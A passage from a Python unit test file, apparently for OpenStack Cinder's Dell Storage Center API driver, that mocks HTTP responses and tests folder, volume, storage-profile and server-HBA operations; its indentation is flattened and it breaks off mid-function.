RESPONSE_200 = response_ok
# Create a Response object that indicates created
response_created = models.Response()
response_created.status_code = 201
response_created.reason = u'created'
RESPONSE_201 = response_created
# Create a Response object that can indicate a failure. Although
# 204 can be a success with no return. (Know your calls!)
response_nc = models.Response()
response_nc.status_code = 204
response_nc.reason = u'duplicate'
RESPONSE_204 = response_nc
# Create a Response object is a pure error.
response_bad = models.Response()
response_bad.status_code = 400
response_bad.reason = u'bad request'
RESPONSE_400 = response_bad
def setUp(self):
super(DellSCSanAPITestCase, self).setUp()
# Configuration is a mock. A mock is pretty much a blank
# slate. I believe mock's done in setup are not happy time
# mocks. So we just do a few things like driver config here.
self.configuration = mock.Mock()
self.configuration.san_is_local = False
self.configuration.san_ip = "192.168.0.1"
self.configuration.san_login = "admin"
self.configuration.san_password = "mmm"
self.configuration.dell_sc_ssn = 12345
self.configuration.dell_sc_server_folder = 'opnstktst'
self.configuration.dell_sc_volume_folder = 'opnstktst'
# Note that we set this to True even though we do not
# test this functionality. This is sent directly to
# the requests calls as the verify parameter and as
# that is a third party library deeply stubbed out is
# not directly testable by this code. Note that in the
# case that this fails the driver fails to even come
# up.
self.configuration.dell_sc_verify_cert = True
self.configuration.dell_sc_api_port = 3033
self.configuration.iscsi_ip_address = '192.168.1.1'
self.configuration.iscsi_port = 3260
self._context = context.get_admin_context()
self.apiversion = '2.0'
# Set up the StorageCenterApi
self.scapi = dell_storagecenter_api.StorageCenterApi(
self.configuration.san_ip,
self.configuration.dell_sc_api_port,
self.configuration.san_login,
self.configuration.san_password,
self.configuration.dell_sc_verify_cert,
self.apiversion)
# Set up the scapi configuration vars
self.scapi.ssn = self.configuration.dell_sc_ssn
self.scapi.sfname = self.configuration.dell_sc_server_folder
self.scapi.vfname = self.configuration.dell_sc_volume_folder
# Note that we set this to True (or not) on the replication tests.
self.scapi.failed_over = False
self.volid = str(uuid.uuid4())
self.volume_name = "volume" + self.volid
self.repl_name = "Cinder repl of volume" + self.volid
def test_path_to_array(self,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._path_to_array(u'folder1/folder2/folder3')
expected = [u'folder1', u'folder2', u'folder3']
self.assertEqual(expected, res, 'Unexpected folder path')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_result',
return_value=SC)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_find_sc(self,
mock_get,
mock_get_result,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.find_sc()
mock_get.assert_called_once_with('StorageCenter/StorageCenter')
self.assertTrue(mock_get_result.called)
self.assertEqual(u'64702', res, 'Unexpected SSN')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_result',
return_value=None)
def test_find_sc_failure(self,
mock_get_result,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.find_sc)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=FLDR)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_201)
def test_create_folder(self,
mock_post,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._create_folder(
'StorageCenter/ScVolumeFolder',
'',
self.configuration.dell_sc_volume_folder)
self.assertTrue(mock_post.called)
self.assertTrue(mock_first_result.called)
self.assertEqual(self.FLDR, res, 'Unexpected Folder')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=FLDR)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_201)
def test_create_folder_with_parent(self,
mock_post,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where parent folder name is specified
res = self.scapi._create_folder(
'StorageCenter/ScVolumeFolder', 'parentFolder',
self.configuration.dell_sc_volume_folder)
self.assertTrue(mock_post.called)
self.assertTrue(mock_first_result.called)
self.assertEqual(self.FLDR, res, 'Unexpected Folder')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_204)
def test_create_folder_failure(self,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._create_folder(
'StorageCenter/ScVolumeFolder', '',
self.configuration.dell_sc_volume_folder)
self.assertIsNone(res, 'Test Create folder - None expected')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_folder',
return_value=FLDR)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_path_to_array',
return_value=['Cinder_Test_Folder'])
def test_create_folder_path(self,
mock_path_to_array,
mock_find_folder,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._create_folder_path(
'StorageCenter/ScVolumeFolder',
self.configuration.dell_sc_volume_folder)
mock_path_to_array.assert_called_once_with(
self.configuration.dell_sc_volume_folder)
self.assertTrue(mock_find_folder.called)
self.assertEqual(self.FLDR, res, 'Unexpected ScFolder')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_create_folder',
return_value=FLDR)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_folder',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_path_to_array',
return_value=['Cinder_Test_Folder'])
def test_create_folder_path_create_fldr(self,
mock_path_to_array,
mock_find_folder,
mock_create_folder,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where folder is not found and must be created
res = self.scapi._create_folder_path(
'StorageCenter/ScVolumeFolder',
self.configuration.dell_sc_volume_folder)
mock_path_to_array.assert_called_once_with(
self.configuration.dell_sc_volume_folder)
self.assertTrue(mock_find_folder.called)
self.assertTrue(mock_create_folder.called)
self.assertEqual(self.FLDR, res, 'Unexpected ScFolder')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_create_folder',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_folder',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_path_to_array',
return_value=['Cinder_Test_Folder'])
def test_create_folder_path_failure(self,
mock_path_to_array,
mock_find_folder,
mock_create_folder,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where folder is not found, must be created
# and creation fails
res = self.scapi._create_folder_path(
'StorageCenter/ScVolumeFolder',
self.configuration.dell_sc_volume_folder)
mock_path_to_array.assert_called_once_with(
self.configuration.dell_sc_volume_folder)
self.assertTrue(mock_find_folder.called)
self.assertTrue(mock_create_folder.called)
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_result',
return_value=u'devstackvol/fcvm/')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_find_folder(self,
mock_post,
mock_get_result,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_folder(
'StorageCenter/ScVolumeFolder',
self.configuration.dell_sc_volume_folder)
self.assertTrue(mock_post.called)
self.assertTrue(mock_get_result.called)
self.assertEqual(u'devstackvol/fcvm/', res, 'Unexpected folder')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_result',
return_value=u'devstackvol/fcvm/')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_find_folder_multi_fldr(self,
mock_post,
mock_get_result,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case for folder path with multiple folders
res = self.scapi._find_folder(
'StorageCenter/ScVolumeFolder',
u'testParentFolder/opnstktst')
self.assertTrue(mock_post.called)
self.assertTrue(mock_get_result.called)
self.assertEqual(u'devstackvol/fcvm/', res, 'Unexpected folder')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_204)
def test_find_folder_failure(self,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_folder(
'StorageCenter/ScVolumeFolder',
self.configuration.dell_sc_volume_folder)
self.assertIsNone(res, 'Test find folder - None expected')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_folder',
return_value=None)
def test_find_volume_folder_fail(self,
mock_find_folder,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where _find_volume_folder returns none
res = self.scapi._find_volume_folder(
False)
mock_find_folder.assert_called_once_with(
'StorageCenter/ScVolumeFolder/GetList',
self.configuration.dell_sc_volume_folder)
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_folder',
return_value=FLDR)
def test_find_volume_folder(self,
mock_find_folder,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_volume_folder(
False)
mock_find_folder.assert_called_once_with(
'StorageCenter/ScVolumeFolder/GetList',
self.configuration.dell_sc_volume_folder)
self.assertEqual(self.FLDR, res, 'Unexpected Folder')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=STORAGE_PROFILE_LIST)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_find_storage_profile_fail(self,
mock_json,
mock_find_folder,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where _find_volume_folder returns none
res = self.scapi._find_storage_profile("Blah")
self.assertIsNone(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=STORAGE_PROFILE_LIST)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_find_storage_profile_none(self,
mock_json,
mock_find_folder,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where _find_storage_profile returns none
res = self.scapi._find_storage_profile(None)
self.assertIsNone(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=STORAGE_PROFILE_LIST)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
@ddt.data('HighPriority', 'highpriority', 'High Priority')
def test_find_storage_profile(self,
value,
mock_json,
mock_find_folder,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_storage_profile(value)
self.assertIsNotNone(res, 'Expected matching storage profile!')
self.assertEqual(self.STORAGE_PROFILE_LIST[1]['instanceId'],
res.get('instanceId'))
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_create_folder_path',
return_value=FLDR)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_folder',
return_value=None)
def test_find_volume_folder_create_folder(self,
mock_find_folder,
mock_create_folder_path,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where _find_volume_folder returns none and folder must be
# created
res = self.scapi._find_volume_folder(
True)
mock_find_folder.assert_called_once_with(
'StorageCenter/ScVolumeFolder/GetList',
self.configuration.dell_sc_volume_folder)
self.assertTrue(mock_create_folder_path.called)
self.assertEqual(self.FLDR, res, 'Unexpected Folder')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'get_volume',
return_value=VOLUME)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'unmap_volume',
return_value=True)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'map_volume',
return_value=MAPPINGS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=SCSERVERS)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_init_volume(self,
mock_post,
mock_get_json,
mock_map_volume,
mock_unmap_volume,
mock_get_volume,
mock_close_connection,
mock_open_connection,
mock_init):
self.scapi._init_volume(self.VOLUME)
self.assertTrue(mock_map_volume.called)
self.assertTrue(mock_unmap_volume.called)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_400)
def test_init_volume_failure(self,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where ScServer list fails
self.scapi._init_volume(self.VOLUME)
self.assertTrue(mock_post.called)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'unmap_volume',
return_value=True)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'map_volume',
return_value=MAPPINGS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=SCSERVERS_DOWN)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_init_volume_servers_down(self,
mock_post,
mock_get_json,
mock_map_volume,
mock_unmap_volume,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where ScServer Status = Down
self.scapi._init_volume(self.VOLUME)
self.assertFalse(mock_map_volume.called)
self.assertFalse(mock_unmap_volume.called)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=VOLUME)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_volume_folder',
return_value=FLDR)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_201)
def test_create_volume(self,
mock_post,
mock_find_volume_folder,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.create_volume(
self.volume_name,
1)
self.assertTrue(mock_post.called)
self.assertTrue(mock_get_json.called)
mock_find_volume_folder.assert_called_once_with(True)
self.assertEqual(self.VOLUME, res, 'Unexpected ScVolume')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_storage_profile',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_volume_folder',
return_value=FLDR)
def test_create_volume_storage_profile_missing(self,
mock_find_volume_folder,
mock_find_storage_profile,
mock_close_connection,
mock_open_connection,
mock_init):
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.create_volume,
self.volume_name,
1,
'Blah')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=VOLUME)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_storage_profile',
return_value=STORAGE_PROFILE_LIST[0])
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_volume_folder',
return_value=FLDR)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_201)
def test_create_volume_storage_profile(self,
mock_post,
mock_find_volume_folder,
mock_find_storage_profile,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
self.scapi.create_volume(
self.volume_name,
1,
'Recommended')
actual = mock_post.call_args[0][1]['StorageProfile']
expected = self.STORAGE_PROFILE_LIST[0]['instanceId']
self.assertEqual(expected, actual)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_search_for_volume',
return_value=VOLUME)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_volume_folder',
return_value=FLDR)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_201)
def test_create_volume_retry_find(self,
mock_post,
mock_find_volume_folder,
mock_get_json,
mock_search_for_volume,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where find_volume is used to do a retry of finding the
# created volume
res = self.scapi.create_volume(
self.volume_name,
1)
self.assertTrue(mock_post.called)
self.assertTrue(mock_get_json.called)
mock_search_for_volume.assert_called_once_with(self.volume_name)
mock_find_volume_folder.assert_called_once_with(True)
self.assertEqual(self.VOLUME, res, 'Unexpected ScVolume')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=VOLUME)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_volume_folder',
return_value=None)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_201)
def test_create_vol_folder_fail(self,
mock_post,
mock_find_volume_folder,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
# Test calling create_volume where volume folder does not exist and
# fails to be created
res = self.scapi.create_volume(
self.volume_name,
1)
self.assertTrue(mock_post.called)
self.assertTrue(mock_get_json.called)
mock_find_volume_folder.assert_called_once_with(True)
self.assertEqual(self.VOLUME, res, 'Unexpected ScVolume')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_volume_folder',
return_value=FLDR)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_400)
def test_create_volume_failure(self,
mock_post,
mock_find_volume_folder,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.create_volume(
self.volume_name,
1)
mock_find_volume_folder.assert_called_once_with(True)
self.assertIsNone(res, 'None expected')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=VOLUME_LIST)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test__get_volume_list_enforce_vol_fldr(self,
mock_post,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case to find volume in the configured volume folder
res = self.scapi._get_volume_list(self.volume_name, None, True)
self.assertTrue(mock_post.called)
self.assertTrue(mock_get_json.called)
self.assertEqual(self.VOLUME_LIST, res, 'Unexpected volume list')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=VOLUME_LIST)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test__get_volume_list_any_fldr(self,
mock_post,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case to find volume anywhere in the configured SC
res = self.scapi._get_volume_list(self.volume_name, None, False)
self.assertTrue(mock_post.called)
self.assertTrue(mock_get_json.called)
self.assertEqual(self.VOLUME_LIST, res, 'Unexpected volume list')
def test_get_volume_list_no_name_no_id(self,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case specified volume name is None and device id is None.
res = self.scapi._get_volume_list(None, None, True)
self.assertIsNone(res, 'None expected')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_204)
def test__get_volume_list_failure(self,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case to find volume in the configured volume folder
res = self.scapi._get_volume_list(self.volume_name, None, True)
self.assertTrue(mock_post.called)
self.assertIsNone(res, 'None expected')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_search_for_volume',
return_value=VOLUME)
def test_find_volume(self,
mock_search_for_volume,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case to find volume by name
res = self.scapi.find_volume(self.volume_name, None)
mock_search_for_volume.assert_called_once_with(self.volume_name)
self.assertEqual(self.VOLUME, res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_search_for_volume',
return_value=None)
def test_find_volume_not_found(self,
mock_search_for_volume,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case to find volume by name
res = self.scapi.find_volume(self.volume_name, None)
mock_search_for_volume.assert_called_once_with(self.volume_name)
self.assertIsNone(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'get_volume',
return_value=VOLUME)
def test_find_volume_with_provider_id(self,
mock_get_volume,
mock_close_connection,
mock_open_connection,
mock_init):
provider_id = str(self.scapi.ssn) + '.1'
res = self.scapi.find_volume(self.volume_name, provider_id)
mock_get_volume.assert_called_once_with(provider_id)
self.assertEqual(self.VOLUME, res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'get_volume')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_search_for_volume',
return_value=VOLUME)
def test_find_volume_with_invalid_provider_id(self,
mock_search_for_volume,
mock_get_volume,
mock_close_connection,
mock_open_connection,
mock_init):
provider_id = 'WrongSSN.1'
res = self.scapi.find_volume(self.volume_name, provider_id)
mock_search_for_volume.assert_called_once_with(self.volume_name)
self.assertFalse(mock_get_volume.called)
self.assertEqual(self.VOLUME, res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'get_volume',
return_value=None)
def test_find_volume_with_provider_id_not_found(self,
mock_get_volume,
mock_close_connection,
mock_open_connection,
mock_init):
provider_id = str(self.scapi.ssn) + '.1'
res = self.scapi.find_volume(self.volume_name, provider_id)
mock_get_volume.assert_called_once_with(provider_id)
self.assertIsNone(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'get_volume')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_import_one',
return_value=VOLUME)
def test_find_volume_with_provider_id_complete_replication(
self,
mock_import_one,
mock_get_volume,
mock_close_connection,
mock_open_connection,
mock_init):
provider_id = str(self.scapi.ssn) + '.1'
# Configure to middle of failover.
self.scapi.failed_over = True
mock_get_volume.return_value = {'name': self.repl_name}
res = self.scapi.find_volume(self.volume_name, provider_id)
self.scapi.failed_over = False
mock_import_one.assert_called_once_with(mock_get_volume.return_value,
self.volume_name)
mock_get_volume.assert_called_once_with(provider_id)
self.assertEqual(self.VOLUME, res, 'Unexpected volume')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'get_volume')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_import_one',
return_value=None)
def test_find_volume_with_provider_id_import_fail(self,
mock_import_one,
mock_get_volume,
mock_close_connection,
mock_open_connection,
mock_init):
provider_id = str(self.scapi.ssn) + '.1'
# Configure to middle of failover.
self.scapi.failed_over = True
mock_get_volume.return_value = {'name': self.repl_name}
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.find_volume, self.volume_name,
provider_id)
self.scapi.failed_over = False
mock_import_one.assert_called_once_with(mock_get_volume.return_value,
self.volume_name)
mock_get_volume.assert_called_once_with(provider_id)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_list',
return_value=None)
def test_search_for_volume_no_name(self,
mock_get_volume_list,
mock_close_connection,
mock_open_connection,
mock_init):
# Test calling find_volume with no name or instanceid
res = self.scapi._search_for_volume(None)
self.assertIsNone(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_list')
def test_search_for_volume_not_found(self,
mock_get_volume_list,
mock_close_connection,
mock_open_connection,
mock_init):
# Test calling find_volume with result of no volume found
mock_get_volume_list.side_effect = [[], []]
res = self.scapi._search_for_volume(self.volume_name)
self.assertIsNone(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_list',
return_value=VOLUME_LIST_MULTI_VOLS)
def test_search_for_volume_multi_vols_found(self,
mock_get_volume_list,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where multiple volumes are found
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi._search_for_volume, self.volume_name)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=VOLUME)
def test_get_volume(self,
mock_get_json,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
provider_id = str(self.scapi.ssn) + '.1'
res = self.scapi.get_volume(provider_id)
mock_get.assert_called_once_with(
'StorageCenter/ScVolume/' + provider_id)
self.assertEqual(self.VOLUME, res)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_400)
def test_get_volume_error(self,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
provider_id = str(self.scapi.ssn) + '.1'
res = self.scapi.get_volume(provider_id)
mock_get.assert_called_once_with(
'StorageCenter/ScVolume/' + provider_id)
self.assertIsNone(res)
def test_get_volume_no_id(self,
mock_close_connection,
mock_open_connection,
mock_init):
provider_id = None
res = self.scapi.get_volume(provider_id)
self.assertIsNone(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=True)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'delete',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_search_for_volume',
return_value=VOLUME)
def test_delete_volume(self,
mock_search_for_volume,
mock_delete,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.delete_volume(self.volume_name)
self.assertTrue(mock_delete.called)
mock_search_for_volume.assert_called_once_with(self.volume_name)
self.assertTrue(mock_get_json.called)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=True)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'delete',
return_value=RESPONSE_200)
def test_delete_volume_with_provider_id(self,
mock_delete,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
provider_id = str(self.scapi.ssn) + '.1'
res = self.scapi.delete_volume(self.volume_name, provider_id)
self.assertTrue(mock_delete.called)
self.assertTrue(mock_get_json.called)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'delete',
return_value=RESPONSE_400)
def test_delete_volume_failure(self,
mock_delete,
mock_close_connection,
mock_open_connection,
mock_init):
provider_id = str(self.scapi.ssn) + '.1'
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.delete_volume, self.volume_name,
provider_id)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_search_for_volume',
return_value=None)
def test_delete_volume_no_vol_found(self,
mock_search_for_volume,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where volume to be deleted does not exist
res = self.scapi.delete_volume(self.volume_name, None)
mock_search_for_volume.assert_called_once_with(self.volume_name)
self.assertTrue(res, 'Expected True')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_folder',
return_value=SVR_FLDR)
def test_find_server_folder(self,
mock_find_folder,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_server_folder(False)
mock_find_folder.assert_called_once_with(
'StorageCenter/ScServerFolder/GetList',
self.configuration.dell_sc_server_folder)
self.assertEqual(self.SVR_FLDR, res, 'Unexpected server folder')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_create_folder_path',
return_value=SVR_FLDR)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_folder',
return_value=None)
def test_find_server_folder_create_folder(self,
mock_find_folder,
mock_create_folder_path,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where specified server folder is not found and must be
# created
res = self.scapi._find_server_folder(True)
mock_find_folder.assert_called_once_with(
'StorageCenter/ScServerFolder/GetList',
self.configuration.dell_sc_server_folder)
self.assertTrue(mock_create_folder_path.called)
self.assertEqual(self.SVR_FLDR, res, 'Unexpected server folder')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_folder',
return_value=None)
def test_find_server_folder_fail(self,
mock_find_folder,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where _find_server_folder returns none
res = self.scapi._find_server_folder(
False)
mock_find_folder.assert_called_once_with(
'StorageCenter/ScServerFolder/GetList',
self.configuration.dell_sc_volume_folder)
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_add_hba(self,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._add_hba(self.SCSERVER,
self.IQN)
self.assertTrue(mock_post.called)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_add_hba_fc(self,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
saveproto = self.scapi.protocol
self.scapi.protocol = 'FibreChannel'
res = self.scapi._add_hba(self.SCSERVER,
self.WWN)
self.assertTrue(mock_post.called)
self.assertTrue(res)
self.scapi.protocol = saveproto
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_400)
def test_add_hba_failure(self,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._add_hba(self.SCSERVER,
self.IQN)
self.assertTrue(mock_post.called)
self.assertFalse(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=SVR_OS_S)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_find_serveros(self,
mock_post,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_serveros('Red Hat Linux 6.x')
self.assertTrue(mock_get_json.called)
self.assertTrue(mock_post.called)
self.assertEqual('64702.38', res, 'Wrong InstanceId')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=SVR_OS_S)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_find_serveros_not_found(self,
mock_post,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
# Test requesting a Server OS that will not be found
res = self.scapi._find_serveros('Non existent OS')
self.assertTrue(mock_get_json.called)
self.assertTrue(mock_post.called)
self.assertIsNone(res, 'None expected')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_400)
def test_find_serveros_failed(self,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_serveros('Red Hat Linux 6.x')
self.assertIsNone(res, 'None expected')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_add_hba',
return_value=FC_HBA)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'create_server',
return_value=SCSERVER)
def test_create_server_multiple_hbas(self,
mock_create_server,
mock_add_hba,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.create_server_multiple_hbas(
self.WWNS)
self.assertTrue(mock_create_server.called)
self.assertTrue(mock_add_hba.called)
self.assertEqual(self.SCSERVER, res, 'Unexpected ScServer')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_add_hba',
return_value=True)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=SCSERVER)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_server_folder',
return_value=SVR_FLDR)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_serveros',
return_value='64702.38')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_201)
def test_create_server(self,
mock_post,
mock_find_serveros,
